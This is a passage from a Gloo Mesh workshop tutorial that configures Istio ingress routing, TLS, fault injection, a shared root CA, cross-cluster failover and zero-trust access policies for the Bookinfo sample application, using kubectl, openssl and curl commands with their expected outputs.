- kind: ALL
labels:
expose: "true"
EOF
The Bookinfo team has decided to export the following to the gateway
workspace (using a reference):
- the
productpage
and thereviews
Kubernetes services - all the resources (RouteTables, VirtualDestination, ...) that have the label
expose
set totrue
This is how the environment looks like with the workspaces:
In this step, we're going to expose the productpage
service through the Ingress Gateway using Gloo Mesh.
The Gateway team must create a VirtualGateway
to configure the Istio Ingress Gateway in cluster1 to listen to incoming requests.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
cluster: cluster1
listeners:
- http: {}
port:
number: 80
allowedRouteTables:
- host: '*'
EOF
Then, the Gateway team should create a parent RouteTable
to configure the main routing.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
In this example, you can see that the Gateway team is delegating the routing details to the bookinfo
and httpbin
workspaces. The teams in charge of these workspaces can expose their services through the gateway.
The Gateway team can use this main RouteTable
to enforce a global WAF policy, but also to have control on which hostnames and paths can be used by each application team.
Then, the Bookinfo team can create a RouteTable
to determine how they want to handle the traffic.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
port:
number: 9080
EOF
You should now be able to access the productpage
application through the browser.
Get the URL to access the productpage
service using the following command:
echo "http://${ENDPOINT_HTTP_GW_CLUSTER1}/productpage"
Gloo Mesh translates the VirtualGateway
and RouteTable
into the corresponding Istio objects (Gateway
and VirtualService
).
Now, let's secure the access through TLS.
Let's first create a private key and a self-signed certificate:
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout tls.key -out tls.crt -subj "/CN=*"
Then, you have to store them in a Kubernetes secrets running the following commands:
kubectl --context ${CLUSTER1} -n istio-gateways create secret generic tls-secret \
--from-file=tls.key=tls.key \
--from-file=tls.crt=tls.crt
kubectl --context ${CLUSTER2} -n istio-gateways create secret generic tls-secret \
--from-file=tls.key=tls.key \
--from-file=tls.crt=tls.crt
Finally, the Gateway team needs to update the VirtualGateway
to use this secret:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
cluster: cluster1
listeners:
- http: {}
port:
number: 80
# ---------------- Redirect to https --------------------
httpsRedirect: true
# -------------------------------------------------------
- http: {}
# ---------------- SSL config ---------------------------
port:
number: 443
tls:
mode: SIMPLE
secretName: tls-secret
# -------------------------------------------------------
allowedRouteTables:
- host: '*'
EOF
You can now access the productpage
application securely through the browser.
Get the URL to access the productpage
service using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/productpage"
This diagram shows the flow of the request (through the Istio Ingress Gateway):
We're going to use Gloo Mesh policies to inject faults and configure timeouts.
Let's create the following FaultInjectionPolicy
to inject a delay when the v2
version of the reviews
service talk to the ratings
service:
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: resilience.policy.gloo.solo.io/v2
kind: FaultInjectionPolicy
metadata:
name: ratings-fault-injection
namespace: bookinfo-backends
spec:
applyToRoutes:
- route:
labels:
fault_injection: "true"
config:
delay:
fixedDelay: 2s
percentage: 100
EOF
As you can see, it will be applied to all the routes that have the label fault_injection
set to "true"
.
So, you need to create a RouteTable
with this label set in the corresponding route.
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: ratings
namespace: bookinfo-backends
spec:
hosts:
- 'ratings.bookinfo-backends.svc.cluster.local'
workloadSelectors:
- selector:
labels:
app: reviews
http:
- name: ratings
labels:
fault_injection: "true"
matchers:
- uri:
prefix: /
forwardTo:
destinations:
- ref:
name: ratings
namespace: bookinfo-backends
port:
number: 9080
EOF
If you refresh the webpage, you should see that it takes longer to get the productpage
loaded when version v2
of the reviews
services is called.
Now, let's configure a 0.5s request timeout when the productpage
service calls the reviews
service on cluster1.
You need to create the following RetryTimeoutPolicy
:
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: resilience.policy.gloo.solo.io/v2
kind: RetryTimeoutPolicy
metadata:
name: reviews-request-timeout
namespace: bookinfo-backends
spec:
applyToRoutes:
- route:
labels:
request_timeout: "0.5s"
config:
requestTimeout: 0.5s
EOF
As you can see, it will be applied to all the routes that have the label request_timeout
set to "0.5s"
.
Then, you need to create a RouteTable
with this label set in the corresponding route.
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: reviews
namespace: bookinfo-backends
spec:
hosts:
- 'reviews.bookinfo-backends.svc.cluster.local'
workloadSelectors:
- selector:
labels:
app: productpage
http:
- name: reviews
labels:
request_timeout: "0.5s"
matchers:
- uri:
prefix: /
forwardTo:
destinations:
- ref:
name: reviews
namespace: bookinfo-backends
port:
number: 9080
subset:
version: v2
EOF
If you refresh the page several times, you'll see an error message telling that reviews are unavailable when the productpage is trying to communicate with the version v2
of the reviews
service.
This diagram shows where the timeout and delay have been applied:
Let's delete the Gloo Mesh objects we've created:
kubectl --context ${CLUSTER1} -n bookinfo-backends delete faultinjectionpolicy ratings-fault-injection
kubectl --context ${CLUSTER1} -n bookinfo-backends delete routetable ratings
kubectl --context ${CLUSTER1} -n bookinfo-backends delete retrytimeoutpolicy reviews-request-timeout
kubectl --context ${CLUSTER1} -n bookinfo-backends delete routetable reviews
To allow secured (end-to-end mTLS) cross cluster communications, we need to make sure the certificates issued by the Istio control plance on each cluster are signed with intermediate certificates which have a common root CA.
Gloo Mesh fully automates this process.
Run this command to see how the communication between microservices occurs currently:
kubectl --context ${CLUSTER1} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
Now, the output should be like that:
...
Certificate chain
0 s:
i:O = cluster1
-----BEGIN CERTIFICATE-----
MIIDFzCCAf+gAwIBAgIRALsoWlroVcCc1n+VROhATrcwDQYJKoZIhvcNAQELBQAw
...
BPiAYRMH5j0gyBqiZZEwCfzfQe1e6aAgie9T
-----END CERTIFICATE-----
1 s:O = cluster1
i:O = cluster1
-----BEGIN CERTIFICATE-----
MIICzjCCAbagAwIBAgIRAKIx2hzMbAYzM74OC4Lj1FUwDQYJKoZIhvcNAQELBQAw
...
uMTPjt7p/sv74fsLgrx8WMI0pVQ7+2plpjaiIZ8KvEK9ye/0Mx8uyzTG7bpmVVWo
ugY=
-----END CERTIFICATE-----
...
Now, run the same command on the second cluster:
kubectl --context ${CLUSTER2} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should be like that:
...
Certificate chain
0 s:
i:O = cluster2
-----BEGIN CERTIFICATE-----
MIIDFzCCAf+gAwIBAgIRALo1dmnbbP0hs1G82iBa2oAwDQYJKoZIhvcNAQELBQAw
...
YvDrZfKNOKwFWKMKKhCSi2rmCvLKuXXQJGhy
-----END CERTIFICATE-----
1 s:O = cluster2
i:O = cluster2
-----BEGIN CERTIFICATE-----
MIICzjCCAbagAwIBAgIRAIjegnzq/hN/NbMm3dmllnYwDQYJKoZIhvcNAQELBQAw
...
GZRM4zV9BopZg745Tdk2LVoHiBR536QxQv/0h1P0CdN9hNLklAhGN/Yf9SbDgLTw
6Sk=
-----END CERTIFICATE-----
...
The first certificate in the chain is the certificate of the workload and the second one is the Istio CA’s signing (CA) certificate.
As you can see, the Istio CA’s signing (CA) certificates are different in the 2 clusters, so one cluster can't validate certificates issued by the other cluster.
Creating a Root Trust Policy will unify these two CAs with a common root identity.
Run the following command to create the Root Trust Policy:
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: RootTrustPolicy
metadata:
name: root-trust-policy
namespace: gloo-mesh
spec:
config:
mgmtServerCa:
generated: {}
autoRestartPods: true # Restarting pods automatically is NOT RECOMMENDED in Production
EOF
When we create the RootTrustPolicy, Gloo Mesh will kick off the process of unifying identities under a shared root.
First, Gloo Mesh will create the Root certificate.
Then, Gloo Mesh will use the Gloo Mesh Agent on each of the clusters to create a new key/cert pair that will form an intermediate CA used by the mesh on that cluster. It will then create a Certificate Request (CR).
Gloo Mesh will then sign the intermediate certificates with the Root certificate.
At that point, we want Istio to pick up the new intermediate CA and start using that for its workloads. To do that Gloo Mesh creates a Kubernetes secret called cacerts
in the istio-system
namespace.
You can have a look at the Istio documentation here if you want to get more information about this process.
Check that the secret containing the new Istio CA has been created in the istio namespace, on the first cluster:
kubectl --context ${CLUSTER1} get secret -n istio-system cacerts -o yaml
Here is the expected output:
apiVersion: v1
data:
ca-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRUG5kRDkwejN4dytYeTBzYzNmcjRmekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
jFWVlZtSWl3Si8va0NnNGVzWTkvZXdxSGlTMFByWDJmSDVDCmhrWnQ4dz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
ca-key.pem: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlKS0FJQkFBS0NBZ0VBczh6U0ZWcEFxeVNodXpMaHVXUlNFMEJJMXVwbnNBc3VnNjE2TzlKdzBlTmhhc3RtClUvZERZS...
DT2t1bzBhdTFhb1VsS1NucldpL3kyYUtKbz0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K
cert-chain.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRUG5kRDkwejN4dytYeTBzYzNmcjRmekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
RBTHpzQUp2ZzFLRUR4T2QwT1JHZFhFbU9CZDBVUDk0KzJCN0tjM2tkNwpzNHYycEV2YVlnPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
key.pem: ""
root-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUU0ekNDQXN1Z0F3SUJBZ0lRT2lZbXFGdTF6Q3NzR0RFQ3JOdnBMakFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
UNBVEUtLS0tLQo=
kind: Secret
metadata:
labels:
context.mesh.gloo.solo.io/cluster: cluster1
context.mesh.gloo.solo.io/namespace: istio-system
gloo.solo.io/parent_cluster: cluster1
gloo.solo.io/parent_group: internal.gloo.solo.io
gloo.solo.io/parent_kind: IssuedCertificate
gloo.solo.io/parent_name: istiod-1-12-istio-system-cluster1
gloo.solo.io/parent_namespace: istio-system
gloo.solo.io/parent_version: v2
reconciler.mesh.gloo.solo.io/name: cert-agent
name: cacerts
namespace: istio-system
type: certificates.mesh.gloo.solo.io/issued_certificate
Same operation on the second cluster:
kubectl --context ${CLUSTER2} get secret -n istio-system cacerts -o yaml
Here is the expected output:
apiVersion: v1
data:
ca-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRWXE1V29iWFhGM1gwTjlNL3BYYkNKekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
XpqQ1RtK2QwNm9YaDI2d1JPSjdQTlNJOTkrR29KUHEraXltCkZIekhVdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
ca-key.pem: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlKS1FJQkFBS0NBZ0VBMGJPMTdSRklNTnh4K1lMUkEwcFJqRmRvbG1SdW9Oc3gxNUUvb3BMQ1l1RjFwUEptCndhR1U1V...
MNU9JWk5ObDA4dUE1aE1Ca2gxNCtPKy9HMkoKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K
cert-chain.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRWXE1V29iWFhGM1gwTjlNL3BYYkNKekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
RBTHpzQUp2ZzFLRUR4T2QwT1JHZFhFbU9CZDBVUDk0KzJCN0tjM2tkNwpzNHYycEV2YVlnPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
key.pem: ""
root-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUU0ekNDQXN1Z0F3SUJBZ0lRT2lZbXFGdTF6Q3NzR0RFQ3JOdnBMakFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
UNBVEUtLS0tLQo=
kind: Secret
metadata:
labels:
context.mesh.gloo.solo.io/cluster: cluster2
context.mesh.gloo.solo.io/namespace: istio-system
gloo.solo.io/parent_cluster: cluster2
gloo.solo.io/parent_group: internal.gloo.solo.io
gloo.solo.io/parent_kind: IssuedCertificate
gloo.solo.io/parent_name: istiod-1-12-istio-system-cluster2
gloo.solo.io/parent_namespace: istio-system
gloo.solo.io/parent_version: v2
reconciler.mesh.gloo.solo.io/name: cert-agent
name: cacerts
namespace: istio-system
type: certificates.mesh.gloo.solo.io/issued_certificate
As you can see, the secrets contain the same Root CA (base64 encoded), but different intermediate certs.
Have a look at the RootTrustPolicy
object we've just created and notice the autoRestartPods: true
in the config
. This instructs Gloo Mesh to restart all the Pods in the mesh.
In recent versions of Istio, the control plane is able to pick up this new cert without any restart, but we would need to wait for the different Pods to renew their certificates (which happens every hour by default).
Now, let's check what certificates we get when we run the same commands we ran before we created the Root Trust Policy:
kubectl --context ${CLUSTER1} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should be like that:
...
Certificate chain
0 s:
i:
-----BEGIN CERTIFICATE-----
MIIEBzCCAe+gAwIBAgIRAK1yjsFkisSjNqm5tzmKQS8wDQYJKoZIhvcNAQELBQAw
...
T77lFKXx0eGtDNtWm/1IPiOutIMlFz/olVuN
-----END CERTIFICATE-----
1 s:
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIFEDCCAvigAwIBAgIQPndD90z3xw+Xy0sc3fr4fzANBgkqhkiG9w0BAQsFADAb
...
hkZt8w==
-----END CERTIFICATE-----
2 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
3 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
...
And let's compare with what we get on the second cluster:
kubectl --context ${CLUSTER2} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should be like that:
...
Certificate chain
0 s:
i:
-----BEGIN CERTIFICATE-----
MIIEBjCCAe6gAwIBAgIQfSeujXiz3KsbG01+zEcXGjANBgkqhkiG9w0BAQsFADAA
...
EtTlhPLbyf2GwkUgzXhdcu2G8uf6o16b0qU=
-----END CERTIFICATE-----
1 s:
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIFEDCCAvigAwIBAgIQYq5WobXXF3X0N9M/pXbCJzANBgkqhkiG9w0BAQsFADAb
...
FHzHUw==
-----END CERTIFICATE-----
2 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
3 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
...
You can see that the last certificate in the chain is now identical on both clusters. It's the new root certificate.
The first certificate is the certificate of the service. Let's decrypt it.
Copy and paste the content of the certificate (including the BEGIN and END CERTIFICATE lines) in a new file called /tmp/cert
and run the following command:
openssl x509 -in /tmp/cert -text
The output should be as follow:
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
7d:27:ae:8d:78:b3:dc:ab:1b:1b:4d:7e:cc:47:17:1a
Signature Algorithm: sha256WithRSAEncryption
Issuer:
Validity
Not Before: Sep 17 08:21:08 2020 GMT
Not After : Sep 18 08:21:08 2020 GMT
Subject:
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
...
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name: critical
URI:spiffe://cluster2/ns/bookinfo-backends/sa/bookinfo-ratings
Signature Algorithm: sha256WithRSAEncryption
...
-----BEGIN CERTIFICATE-----
MIIEBjCCAe6gAwIBAgIQfSeujXiz3KsbG01+zEcXGjANBgkqhkiG9w0BAQsFADAA
...
EtTlhPLbyf2GwkUgzXhdcu2G8uf6o16b0qU=
-----END CERTIFICATE-----
The Subject Alternative Name (SAN) is the most interesting part. It allows the sidecar proxy of the reviews
service to validate that it talks to the sidecar proxy of the ratings
service.
We also need to make sure we restart our in-mesh
deployment because it's not yet part of a Workspace
:
kubectl --context ${CLUSTER1} -n httpbin rollout restart deploy/in-mesh
Right now, we've only exposed the productpage
service on the first cluster.
In this lab, we're going to make it available on both clusters.
Let's update the VirtualGateway to expose it on both clusters.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
listeners:
- http: {}
port:
number: 80
httpsRedirect: true
- http: {}
port:
number: 443
tls:
mode: SIMPLE
secretName: tls-secret
allowedRouteTables:
- host: '*'
EOF
Then, we can configure the RouteTable
to send the traffic to a Virtual Destination which will be composed of the productpage
services running in both clusters.
Let's create this Virtual Destination.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualDestination
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
hosts:
- productpage.global
services:
- namespace: bookinfo-frontends
labels:
app: productpage
ports:
- number: 9080
protocol: HTTP
EOF
Note that we have added the label expose
with the value true
to make sure it will be exported to the Gateway ̀̀Workspace
.
After that, we need to update the RouteTable
to use it.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
kind: VIRTUAL_DESTINATION
port:
number: 9080
EOF
You can now access the productpage
service using the gateway of the second cluster.
Get the URL to access the productpage
service from the second cluster using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER2}/productpage"
Now, if you try to access it from the first cluster, you can see that you now get the v3
version of the reviews
service (red stars).
This diagram shows the flow of the request (through both Istio ingress gateways):
It's nice, but you generally want to direct the traffic to the local services if they're available and failover to the remote cluster only when they're not.
In order to do that we need to create 2 other policies.
The first one is a FailoverPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: resilience.policy.gloo.solo.io/v2
kind: FailoverPolicy
metadata:
name: failover
namespace: bookinfo-frontends
spec:
applyToDestinations:
- kind: VIRTUAL_DESTINATION
selector:
labels:
failover: "true"
config:
localityMappings: []
EOF
It will update the Istio DestinationRule
to enable failover.
Note that failover is enabled by default, so creating this FailoverPolicy
is optional. By default, it will try to failover to the same zone, then same region and finally anywhere. A FailoverPolicy
is generally used when you want to change this default behavior. For example, if you have many regions, you may want to failover only to a specific region.
The second one is an OutlierDetectionPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: resilience.policy.gloo.solo.io/v2
kind: OutlierDetectionPolicy
metadata:
name: outlier-detection
namespace: bookinfo-frontends
spec:
applyToDestinations:
- kind: VIRTUAL_DESTINATION
selector:
labels:
failover: "true"
config:
consecutiveErrors: 2
interval: 5s
baseEjectionTime: 30s
maxEjectionPercent: 100
EOF
It will update the Istio DestinationRule
to specify how/when we want the failover to happen.
As you can see, both policies will be applied to VirtualDestination
objects that have the label failover
set to "true"
.
So we need to update the VirtualDestination
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualDestination
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
failover: "true"
spec:
hosts:
- productpage.global
services:
- namespace: bookinfo-frontends
labels:
app: productpage
ports:
- number: 9080
protocol: HTTP
EOF
Now, if you try to access the productpage from the first cluster, you should only get the v1
and v2
versions (the local ones).
This updated diagram shows the flow of the requests using the local services:
If the productpage
service doesn't exist on the first cluster, the Istio Ingress Gateway of this cluster will automatically use the productpage
service running on the other cluster.
Let's try this:
kubectl --context ${CLUSTER1} -n bookinfo-frontends scale deploy/productpage-v1 --replicas=0
kubectl --context ${CLUSTER1} -n bookinfo-frontends wait --for=jsonpath='{.spec.replicas}'=0 deploy/productpage-v1
You can still access the application on cluster1 even if the productpage isn't running there anymore. And you can see the v3
version of the reviews
service (red stars).
This updated diagram shows the flow of the request now that the productpage
service isn't running in the first cluster:
Let's restart the productpage
service:
kubectl --context ${CLUSTER1} -n bookinfo-frontends scale deploy/productpage-v1 --replicas=1
kubectl --context ${CLUSTER1} -n bookinfo-frontends wait --for=jsonpath='{.status.readyReplicas}'=1 deploy/productpage-v1
But what happens if the productpage
service is running, but is unavailable ?
Let's try !
The following command will patch the deployment to run a new version which won't respond to the incoming requests.
kubectl --context ${CLUSTER1} -n bookinfo-frontends patch deploy productpage-v1 --patch '{"spec": {"template": {"spec": {"containers": [{"name": "productpage","command": ["sleep", "20h"]}]}}}}'
kubectl --context ${CLUSTER1} -n bookinfo-frontends rollout status deploy/productpage-v1
You can still access the bookinfo application.
This updated diagram shows the flow of the request now that the productpage
service isn't available in the first cluster:
Run the following command to make the productpage
available again in the first cluster
kubectl --context ${CLUSTER1} -n bookinfo-frontends patch deployment productpage-v1 --type json -p '[{"op": "remove", "path": "/spec/template/spec/containers/0/command"}]'
kubectl --context ${CLUSTER1} -n bookinfo-frontends rollout status deploy/productpage-v1
Let's apply the original RouteTable
yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
port:
number: 9080
EOF
And also delete the different objects we've created:
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete virtualdestination productpage
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete failoverpolicy failover
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete outlierdetectionpolicy outlier-detection
In the previous step, we federated multiple meshes and established a shared root CA for a shared identity domain.
All the communications between Pods in the mesh are now encrypted by default, but:
- communications between services that are in the mesh and others which aren't in the mesh are still allowed and not encrypted
- all the services can talk together
Let's validate this.
Run the following commands to initiate a communication from a service which isn't in the mesh to a service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=not-in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a 200
response code which confirm that the communication is currently allowed.
Run the following commands to initiate a communication from a service which is in the mesh to another service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a 200
response code again.
To enfore a zero trust policy, it shouldn't be the case.
We'll leverage the Gloo Mesh workspaces to get to a state where:
- communications between services which are in the mesh and others which aren't in the mesh aren't allowed anymore
- communications between services in the mesh are allowed only when services are in the same workspace or when their workspaces have import/export rules.
The Bookinfo team must update its WorkspaceSettings
Kubernetes object to enable service isolation.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
- kind: ALL
labels:
expose: "true"
options:
serviceIsolation:
enabled: true
trimProxyConfig: true
EOF
When service isolation is enabled, Gloo Mesh creates the corresponding Istio AuthorizationPolicy
and PeerAuthentication
objects to enforce zero trust.
When trimProxyConfig
is set to true
, Gloo Mesh also creates the corresponding Istio Sidecar
objects to program the sidecar proxies to only know how to talk to the authorized services.
If you refresh the browser, you'll see that the bookinfo application is still exposed and working correctly.
Run the following commands to initiate a communication from a service which isn't in the mesh to a service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=not-in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a 000
response code which means that the communication can't be established.
Run the following commands to initiate a communication from a service which is in the mesh to another service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a 403
response code which means that the sidecar proxy of the reviews
service doesn't allow the request.
You've see seen how Gloo Platform can help you to enforce a zero trust policy (at workspace level) with nearly no effort.
Now we are going to define some additional policies to achieve zero trust at service level.
We are going to define AccessPolicies from the point of view of a service producers.
I am owner of service A, which services needs to communicate with me?
Productpage app is the only service which is exposed to the internet, so we will create an AccessPolicy
to allow the Istio Ingress Gateway to forward requests to the productpage service.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: frontend-api-access
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: productpage
config:
authz:
allowedClients:
- serviceAccountSelector:
name: istio-ingressgateway-1-17-service-account
namespace: istio-gateways
- serviceAccountSelector:
name: istio-eastwestgateway-1-17-service-account
namespace: istio-gateways
- serviceAccountSelector:
name: ext-auth-service
namespace: gloo-mesh-addons
- serviceAccountSelector:
name: rate-limiter
namespace: gloo-mesh-addons
EOF
Details and reviews are both used by the productpage service, so we will create an AccessPolicy to allow the productpage service to forward requests to the details and reviews services.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: allow-details-reviews
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: details
- selector:
labels:
app: reviews
config:
authz:
allowedClients:
- serviceAccountSelector:
name: bookinfo-productpage
EOF
Finally, we will create an AccessPolicy to allow the reviews service to forward requests to the ratings service.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: allow-ratings
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: ratings
config:
authz:
allowedClients:
- serviceAccountSelector:
name: bookinfo-reviews
EOF
Let's check that requests from productpage
are denied/allowed properly:
pod=$(kubectl --context ${CLUSTER1} -n bookinfo-frontends get pods -l app=productpage -o jsonpath='{.items[0].metadata.name}')
echo "From productpage to details, should be allowed"
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://details.bookinfo-backends:9080/details/0 | jq
echo "From productpage to reviews, should be allowed"
